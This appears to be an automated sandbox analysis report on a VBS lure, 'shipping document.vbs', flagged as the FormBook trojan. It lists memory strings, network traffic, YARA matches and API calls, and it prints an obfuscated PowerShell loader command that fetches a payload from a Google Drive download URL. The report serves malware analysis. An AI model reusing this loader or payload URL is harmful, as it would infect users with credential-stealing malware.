68 72 65 66 3d 22 68 74 74 70 3a 2f 2f 61 2d 74 77 6f 2d 73 70 61 2d 73 61 6c 6f 6e 2e 63 6f 6d 2f 78 6d 6c 72 70 63 2e 70 68 70 22 3e 0d 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 27 72 6f 62 6f 74 73 27 20 63 6f 6e 74 65 6e 74 3d 27 6d 61 78 2d 69 6d 61 67 65 2d 70 72 65 76 69 65 77 3a 6c 61 72 67 65 27 20 2f 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 27 64 6e 73 2d 70 72 65 66 65 74 63 68 27 20 68 72 65 66 3d 27 2f 2f 61 2d 74 77 6f 2d 73 70 61 2d 73 61 6c 6f 6e 2e 63 6f 6d 27 20 2f 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 61 6c 74 65 72 6e 61 74 65 22 20 74 79 70 65 3d 22 61 70 70 6c 69 63 61 74 69 6f 6e 2f 72 73 73 2b 78 6d 6c 22 20 74 69 74 6c 65 3d 22 41 2d 74 77 6f 20 e3 83 98 e3 83 83 e3 83 89 e3 82 b9 e3 83 91 ef bc 86 e3 83 97 e3 83 a9 e3 82 a4 e3 83 99 e3 83 bc e3 83 88 e3 82 b5 e3 83 ad e3 83 b3 20 26 72 61 71 75 6f 3b 20 e3 83 95 e3 82 a3 e3 83 bc e3 83 89 22 20 68 72 65 66 3d 22 68 74 74 70 3a 2f 2f 61 2d 74 77 6f 2d 73 70 61 2d 73 61 6c 6f 6e 2e 63 6f 6d 2f 66 65 65 64 2f 22 20 2f 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 61 6c 74 65 72 6e 61 74 65 22 20 74 79 70 65 3d 22 61 70 70 6c 69 63 61 74 69 6f 6e 2f 72 73 73 2b 78 6d 6c 22 20 74 69 74 6c 65 3d 22 41 2d 74 77 6f 20 e3 83 98 e3 83 83 e3 83 89 e3 82 b9 e3 83 91 ef bc 86 e3 83 97 e3 83 a9 e3 82 a4 e3 83 99 e3 83 bc e3 83 88 e3 82 b5 e3 83 ad e3 83 b3 20 26 72 61 71 75 6f 3b 20 e3 82 b3 e3 83 a1 e3 83 b3 e3 83 88 e3 83 95 e3 82 a3 e3 83 bc e3 83 89 22 20 68 72 65 66 3d 22 68 74 74 70 3a 2f 2f 61 2d 74
        Source: wscript.exe, 00000000.00000003.1587198761.0000023236DAF000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000002.1588971000.0000023236E3A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en
        Source: wscript.exe, 00000000.00000003.1587198761.0000023236DAF000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000002.1588971000.0000023236E3A000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000002.1589082209.0000023238BA0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en/authrootstl.cab
        Source: wscript.exe, 00000000.00000003.1471191935.0000023238C09000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1470955854.0000023238BE1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ctldl.windowsupdate.com:80/msdownload/update/v3/static/trustedr/en/authrootstl.cab?b1a9c0e1c6
        Source: powershell.exe, 00000003.00000002.1987110176.000001FCDF312000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://drive.google.com
        Source: powershell.exe, 00000003.00000002.1987110176.000001FCDF34C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://drive.usercontent.google.com
        Source: firefox.exe, 00000015.00000002.2537345110.000000002C054000.00000004.80000000.00040000.00000000.sdmpString found in binary or memory: http://hostname.domain.tld/
        Source: powershell.exe, 00000003.00000002.2059655451.000001FCED5D2000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.1930663126.000000000559B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://nuget.org/NuGet.exe
        Source: powershell.exe, 00000009.00000002.1927433604.0000000004687000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.1934884709.0000000007141000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://pesterbdd.com/images/Pester.png
        Source: powershell.exe, 00000003.00000002.1987110176.000001FCDD561000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.1927433604.0000000004531000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
        Source: powershell.exe, 00000009.00000002.1927433604.0000000004687000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.1934884709.0000000007141000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.1934884709.0000000007099000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
        Source: powershell.exe, 00000009.00000002.1934884709.0000000007141000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.microsoft.
        Source: powershell.exe, 00000009.00000002.1934884709.0000000007141000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.microsoft.ps/Docs/Repository.htm0
        Source: powershell.exe, 00000003.00000002.1987110176.000001FCDD561000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://aka.ms/pscore68
        Source: powershell.exe, 00000009.00000002.1927433604.0000000004531000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://aka.ms/pscore6lB
        Source: powershell.exe, 00000003.00000002.1987110176.000001FCDD9E8000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1987110176.000001FCDF312000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1987110176.000001FCDF339000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1987110176.000001FCDF335000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://apis.google.com
        Source: powershell.exe, 00000009.00000002.1930663126.000000000559B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/
        Source: powershell.exe, 00000009.00000002.1930663126.000000000559B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/Icon
        Source: powershell.exe, 00000009.00000002.1930663126.000000000559B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/License
        Source: powershell.exe, 00000003.00000002.1987110176.000001FCDEFBA000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://drive.googP
        Source: powershell.exe, 00000003.00000002.1987110176.000001FCDD787000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1987110176.000001FCDEFBA000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com
        Source: powershell.exe, 00000003.00000002.1987110176.000001FCDD787000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/uc?export=download&id=1oDj9i8b8gD74VUcO_0mAaRxSOZjEINB5P
        Source: powershell.exe, 00000009.00000002.1927433604.0000000004687000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/uc?export=download&id=1oDj9i8b8gD74VUcO_0mAaRxSOZjEINB5XR
        Source: powershell.exe, 00000003.00000002.1987110176.000001FCDF339000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://drive.usercontent.googh
        Source: powershell.exe, 00000003.00000002.1987110176.000001FCDF339000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1987110176.000001FCDD9EC000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://drive.usercontent.google.com
        Source: powershell.exe, 00000003.00000002.1987110176.000001FCDD9E8000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1987110176.000001FCDF312000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1987110176.000001FCDF339000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1987110176.000001FCDF335000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1987110176.000001FCDD9EC000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://drive.usercontent.google.com/download?id=1oDj9i8b8gD74VUcO_0mAaRxSOZjEINB5&export=download
        Source: powershell.exe, 00000009.00000002.1927433604.0000000004687000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.1934884709.0000000007141000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://github.com/Pester/Pester
        Source: powershell.exe, 00000003.00000002.1987110176.000001FCDE9B9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://go.micro
        Source: powershell.exe, 00000003.00000002.2059655451.000001FCED5D2000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.1930663126.000000000559B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://nuget.org/nuget.exe
        Source: powershell.exe, 00000003.00000002.1987110176.000001FCDD9E8000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1987110176.000001FCDF312000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1987110176.000001FCDF339000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1987110176.000001FCDF335000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ssl.gstatic.com
        Source: powershell.exe, 00000003.00000002.1987110176.000001FCDD9E8000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1987110176.000001FCDF312000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1987110176.000001FCDF339000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1987110176.000001FCDF335000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.google-analytics.com;report-uri
        Source: powershell.exe, 00000003.00000002.1987110176.000001FCDD9E8000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1987110176.000001FCDF312000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1987110176.000001FCDF339000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1987110176.000001FCDF335000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.google.com
        Source: powershell.exe, 00000003.00000002.1987110176.000001FCDD9E8000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1987110176.000001FCDF312000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1987110176.000001FCDF339000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1987110176.000001FCDF335000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.googletagmanager.com
        Source: powershell.exe, 00000003.00000002.1987110176.000001FCDD9E8000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1987110176.000001FCDF312000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1987110176.000001FCDF339000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1987110176.000001FCDF335000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.gstatic.com
        Source: unknownNetwork traffic detected: HTTP traffic on port 49706 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49707 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49707
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49706
        Source: unknownNetwork traffic detected: HTTP traffic on port 49716 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49715 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49716
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49715
        Source: unknownHTTPS traffic detected: 142.251.41.14:443 -> 192.168.2.9:49706 version: TLS 1.2
        Source: unknownHTTPS traffic detected: 142.251.35.161:443 -> 192.168.2.9:49707 version: TLS 1.2
        Source: unknownHTTPS traffic detected: 142.251.41.14:443 -> 192.168.2.9:49715 version: TLS 1.2
        Source: unknownHTTPS traffic detected: 142.251.35.161:443 -> 192.168.2.9:49716 version: TLS 1.2

        E-Banking Fraud

        barindex
        Yara detected FormBook
        Source: Yara matchFile source: 00000011.00000002.2753491610.00000000032F0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
        Source: Yara matchFile source: 0000000C.00000002.2249406825.00000000026D0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000012.00000002.2755502958.0000000002150000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
        Source: Yara matchFile source: 0000000C.00000002.2265395528.0000000021930000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000010.00000002.2754713283.00000000043B0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000011.00000002.2753361689.0000000003280000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000011.00000002.2752855309.0000000003000000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY

        System Summary

        barindex
        Malicious sample detected (through community Yara rule)
        Source: amsi32_5852.amsi.csv, type: OTHERMatched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
        Source: 00000011.00000002.2753491610.00000000032F0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
        Source: 0000000C.00000002.2249406825.00000000026D0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
        Source: 00000012.00000002.2755502958.0000000002150000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
        Source: 0000000C.00000002.2265395528.0000000021930000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
        Source: 00000010.00000002.2754713283.00000000043B0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
        Source: 00000011.00000002.2753361689.0000000003280000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
        Source: 00000011.00000002.2752855309.0000000003000000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
        Source: Process Memory Space: powershell.exe PID: 6856, type: MEMORYSTRMatched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
        Source: Process Memory Space: powershell.exe PID: 5852, type: MEMORYSTRMatched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
        Potential malicious VBS script found (suspicious strings)
        Source: Initial file: Forbrugerprises.ShellExecute Investeringsrammens,Kommunikere,"","" ,Arbejdsanvisning
        Sample has a suspicious name (potential lure to open the executable)
        Source: shipping document.vbsStatic file information: Suspicious name
        Very long command line found
        Source: C:\Windows\System32\wscript.exeProcess created: Commandline size = 6558
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: Commandline size = 6558
        Source: C:\Windows\System32\wscript.exeProcess created: Commandline size = 6558Jump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: Commandline size = 6558Jump to behavior
        Writes or reads registry keys via WMI
        Source: C:\Windows\System32\wscript.exeWMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::EnumKey
        Source: C:\Windows\System32\wscript.exeWMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::EnumKey
        Source: C:\Windows\System32\wscript.exeWMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::EnumKey
        Source: C:\Windows\System32\wscript.exeWMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::EnumKey
        Source: C:\Windows\System32\wscript.exeWMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::EnumKey
        Source: C:\Windows\System32\wscript.exeWMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::EnumKey
        Source: C:\Windows\System32\wscript.exeWMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::EnumKey
        Source: C:\Windows\System32\wscript.exeWMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::EnumKey
        Source: C:\Windows\System32\wscript.exeWMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::EnumKey
        Source: C:\Windows\System32\wscript.exeWMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::EnumKey
        Source: C:\Windows\System32\wscript.exeWMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::EnumKey
        Source: C:\Windows\System32\wscript.exeWMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::EnumKey
        Source: C:\Windows\System32\wscript.exeWMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::EnumKey
        Source: C:\Windows\System32\wscript.exeWMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::EnumKey
        Source: C:\Windows\System32\wscript.exeWMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::EnumKey
        Source: C:\Windows\System32\wscript.exeWMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::EnumKey
        Source: C:\Windows\System32\wscript.exeWMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::EnumKey
        Wscript starts Powershell (via cmd or directly)
        Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$Ricki = 1;$Gehenna='Substrin';$Gehenna+='g';Function Quillaia($Overbevokser){$Feasibilities=$Overbevokser.Length-$Ricki;For($Kompeni=5; $Kompeni -lt $Feasibilities; $Kompeni+=(6)){$Fortrnelse+=$Overbevokser.$Gehenna.Invoke($Kompeni, $Ricki);}$Fortrnelse;}function Standglas249($Babbittess){. ($Uti) ($Babbittess);}$Usheen=Quillaia ' S.bcM Autoo,roomzA,uatiPreenlUdspil emieaM.cov/Toakt5Ethno. Org,0Kille Het,r(EgetfW SelviNedrunSt nidva.ieogunvaw Brugsisbje propeNTidsfTAgter Stdta1Scale0Ma em.Spu.g0Rensn;A ver B,dedWUrpr,iWoundn Sprn6Hex n4Sub,e; c.to Az.mexSvine6k evr4 Non.;Perso Viruera,tndv Han,:Store1 horo2F ret1 oeme. opti0Inten)Skerr ForkrGSept,eSelebc histkLe,lio As,r/ Inhe2Tailz0Efter1.ndos0.euro0Overb1Bund 0,arav1Ore,t OperFL.udai SprurSto,ve,traafSlavio,earax .hot/ Udsu1 Eger2 Me.l1Krabd.Spinu0Maedt ';$Bogholdersker=Quillaia 'ForbiUOscilsadr.seGangwrBevat- h,ldATheurgPi kyeSemidnKrilrt Ly p ';$Fint=Quillaia 'NondihBlockt ReintEtmaapInsers Indf:Inter/defo /T pvodFryserUn aciTilb vSysseeExecr.Kurs gberr oAdfrdo Loo.gInconlAf aleGabes. .lotc Ant o SuccmGodhj/TermouMoun.cTermo?maletefo,grxNo.cupInconoCensur.ejebtBarra=apraxd pulvocohenwHan.knHol bl I.froCaseaaHyr,sdPol r&Ar,npiTrichdBestr= Gar,1Unmo oArbejD FugtjLsead9Univei Po,c8SubbabFilat8 egngBrnefDFu,le7Adspu4BordvVAr.hdU ockac.abenOGamel_Samme0Tiltrm PaynAArb.taF.rreRSkulkxUnmusSVildfOAn,ipZSmithj KorrE l,efISu.pkNU derBNucul5 Burm ';$Observandernes=Quillaia ' Gna >Stand ';$Uti=Quillaia 'DialaiM,ddeePr.dexNonex ';$Akkumulerede = Quillaia 'SkaffeNar,ocDatamhCathoou,ali Fanem%MedisaRetsgpAlligpEjersd ,maaaIndsttKomb a Meta%U,all\ LoenFWagneiTraktnTys,li PillnGinesd forssisoagt El viOve slFrilslArsh,iRetran KursgTeksteProkurUnifan Prece,eklasUd,ap1Wa,py1B tte9 Dext.ArikoU outpnAfkaliIdeal Ne,tb&F,rbi&Flamm ozaeeFiresc St,chfiguro lede Illog$Ulovm ';Standglas249 (Quillaia ' Cent$Amidog .luklY,ereogarnibRetrtaN,nirlUdate:org.nR echrerekinsPreapiKonjagHe nenMa.emeHogmorSlagte,appanpomeld.senseEgn,rsIn,ri=Ndraa( NatucF,jtimKunstd Bvre kants/ Un,oc Fic, Yemen$ Stv,AKravekTnneskKombiuFidusmlejrsuCardiltrykkeMinj rAccoueSkrivd doupeAroma)Pal,o ');Standglas249 (Quillaia ' Mask$Admirg R.shlQuarto Unrib S.deaDansel Fork: NummPReachrGlazef M.llaValgrbDiphtrGenkeiL.viskUnseneVugger,rnne=Learn$JernbFChalliKhevznUdsigtSkull. HressWolffp Un,rl UbndiStjertMa,ri(Tapet$Do,laORringb Ge,ts.nasseAk,usrRvhulvPanoraYnglen RecldFremfeZernerPsychn almueU.loosDispe)Ermel ');$Fint=$Prfabriker[0];Standglas249 (Quillaia ' Akti$actingUnderlJackpo Fidgb OptiaP mphl Pira: baanR Mde.eHejrepTilsla Lejei SkelnOve,dtuncomeCasanrderivsEti.l=FlskeNVo ubenoncuw Ho n- MethOVoldgbEf erjThyr,esen ocBin.itExtra S.cerS Egnsy Ide,sforkatHyrevemot vmchaut. UdslNBro zeHollytJuv l.GvestW ecome BrofbunlooCIncarl UdbyiFreere,aglynSpdbrtUdvik ');Standglas249 (Quillaia 'Psal.$,avshR .krieProtopTerroaCoyotiMovabnBej,st p
        Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$Ricki = 1;$Gehenna='Substrin';$Gehenna+='g';Function Quillaia($Overbevokser){$Feasibilities=$Overbevokser.Length-$Ricki;For($Kompeni=5; $Kompeni -lt $Feasibilities; $Kompeni+=(6)){$Fortrnelse+=$Overbevokser.$Gehenna.Invoke($Kompeni, $Ricki);}$Fortrnelse;}function Standglas249($Babbittess){. ($Uti) ($Babbittess);}$Usheen=Quillaia ' S.bcM Autoo,roomzA,uatiPreenlUdspil emieaM.cov/Toakt5Ethno. Org,0Kille Het,r(EgetfW SelviNedrunSt nidva.ieogunvaw Brugsisbje propeNTidsfTAgter Stdta1Scale0Ma em.Spu.g0Rensn;A ver B,dedWUrpr,iWoundn Sprn6Hex n4Sub,e; c.to Az.mexSvine6k evr4 Non.;Perso Viruera,tndv Han,:Store1 horo2F ret1 oeme. opti0Inten)Skerr ForkrGSept,eSelebc histkLe,lio As,r/ Inhe2Tailz0Efter1.ndos0.euro0Overb1Bund 0,arav1Ore,t OperFL.udai SprurSto,ve,traafSlavio,earax .hot/ Udsu1 Eger2 Me.l1Krabd.Spinu0Maedt ';$Bogholdersker=Quillaia 'ForbiUOscilsadr.seGangwrBevat- h,ldATheurgPi kyeSemidnKrilrt Ly p ';$Fint=Quillaia 'NondihBlockt ReintEtmaapInsers Indf:Inter/defo /T pvodFryserUn aciTilb vSysseeExecr.Kurs gberr oAdfrdo Loo.gInconlAf aleGabes. .lotc Ant o SuccmGodhj/TermouMoun.cTermo?maletefo,grxNo.cupInconoCensur.ejebtBarra=apraxd pulvocohenwHan.knHol bl I.froCaseaaHyr,sdPol r&Ar,npiTrichdBestr= Gar,1Unmo oArbejD FugtjLsead9Univei Po,c8SubbabFilat8 egngBrnefDFu,le7Adspu4BordvVAr.hdU ockac.abenOGamel_Samme0Tiltrm PaynAArb.taF.rreRSkulkxUnmusSVildfOAn,ipZSmithj KorrE l,efISu.pkNU derBNucul5 Burm ';$Observandernes=Quillaia ' Gna >Stand ';$Uti=Quillaia 'DialaiM,ddeePr.dexNonex ';$Akkumulerede = Quillaia 'SkaffeNar,ocDatamhCathoou,ali Fanem%MedisaRetsgpAlligpEjersd ,maaaIndsttKomb a Meta%U,all\ LoenFWagneiTraktnTys,li PillnGinesd forssisoagt El viOve slFrilslArsh,iRetran KursgTeksteProkurUnifan Prece,eklasUd,ap1Wa,py1B tte9 Dext.ArikoU outpnAfkaliIdeal Ne,tb&F,rbi&Flamm ozaeeFiresc St,chfiguro lede Illog$Ulovm ';Standglas249 (Quillaia ' Cent$Amidog .luklY,ereogarnibRetrtaN,nirlUdate:org.nR echrerekinsPreapiKonjagHe nenMa.emeHogmorSlagte,appanpomeld.senseEgn,rsIn,ri=Ndraa( NatucF,jtimKunstd Bvre kants/ Un,oc Fic, Yemen$ Stv,AKravekTnneskKombiuFidusmlejrsuCardiltrykkeMinj rAccoueSkrivd doupeAroma)Pal,o ');Standglas249 (Quillaia ' Mask$Admirg R.shlQuarto Unrib S.deaDansel Fork: NummPReachrGlazef M.llaValgrbDiphtrGenkeiL.viskUnseneVugger,rnne=Learn$JernbFChalliKhevznUdsigtSkull. HressWolffp Un,rl UbndiStjertMa,ri(Tapet$Do,laORringb Ge,ts.nasseAk,usrRvhulvPanoraYnglen RecldFremfeZernerPsychn almueU.loosDispe)Ermel ');$Fint=$Prfabriker[0];Standglas249 (Quillaia ' Akti$actingUnderlJackpo Fidgb OptiaP mphl Pira: baanR Mde.eHejrepTilsla Lejei SkelnOve,dtuncomeCasanrderivsEti.l=FlskeNVo ubenoncuw Ho n- MethOVoldgbEf erjThyr,esen ocBin.itExtra S.cerS Egnsy Ide,sforkatHyrevemot vmchaut. UdslNBro zeHollytJuv l.GvestW ecome BrofbunlooCIncarl UdbyiFreere,aglynSpdbrtUdvik ');Standglas249 (Quillaia 'Psal.$,avshR .krieProtopTerroaCoyotiMovabnBej,st pJump to behavior
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_202535C0 NtCreateMutant,LdrInitializeThunk,12_2_202535C0
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_20252C70 NtFreeVirtualMemory,LdrInitializeThunk,12_2_20252C70
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_20252DF0 NtQuerySystemInformation,LdrInitializeThunk,12_2_20252DF0
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_20253010 NtOpenDirectoryObject,12_2_20253010
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_20253090 NtSetValueKey,12_2_20253090
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_20254340 NtSetContextThread,12_2_20254340
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_20254650 NtSuspendThread,12_2_20254650
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_202539B0 NtGetContextThread,12_2_202539B0
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_20252AB0 NtWaitForSingleObject,12_2_20252AB0
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_20252AF0 NtWriteFile,12_2_20252AF0
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_20252AD0 NtReadFile,12_2_20252AD0
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_20252B60 NtClose,12_2_20252B60
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_20252BA0 NtEnumerateValueKey,12_2_20252BA0
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_20252B80 NtQueryInformationFile,12_2_20252B80
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_20252BE0 NtQueryValueKey,12_2_20252BE0
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_20252BF0 NtAllocateVirtualMemory,12_2_20252BF0
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_20252C00 NtQueryInformationProcess,12_2_20252C00
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_20252C60 NtCreateKey,12_2_20252C60
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_20252CA0 NtQueryInformationToken,12_2_20252CA0
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_20252CF0 NtOpenProcess,12_2_20252CF0
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_20252CC0 NtQueryVirtualMemory,12_2_20252CC0
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_20252D30 NtUnmapViewOfSection,12_2_20252D30
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_20252D00 NtSetInformationFile,12_2_20252D00
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_20253D10 NtOpenProcessToken,12_2_20253D10
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_20252D10 NtMapViewOfSection,12_2_20252D10
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_20253D70 NtOpenThread,12_2_20253D70
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_20252DB0 NtEnumerateKey,12_2_20252DB0
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_20252DD0 NtDelayExecution,12_2_20252DD0
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_20252E30 NtWriteVirtualMemory,12_2_20252E30
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_20252EA0 NtAdjustPrivilegesToken,12_2_20252EA0
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_20252E80 NtReadVirtualMemory,12_2_20252E80
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_20252EE0 NtQueueApcThread,12_2_20252EE0
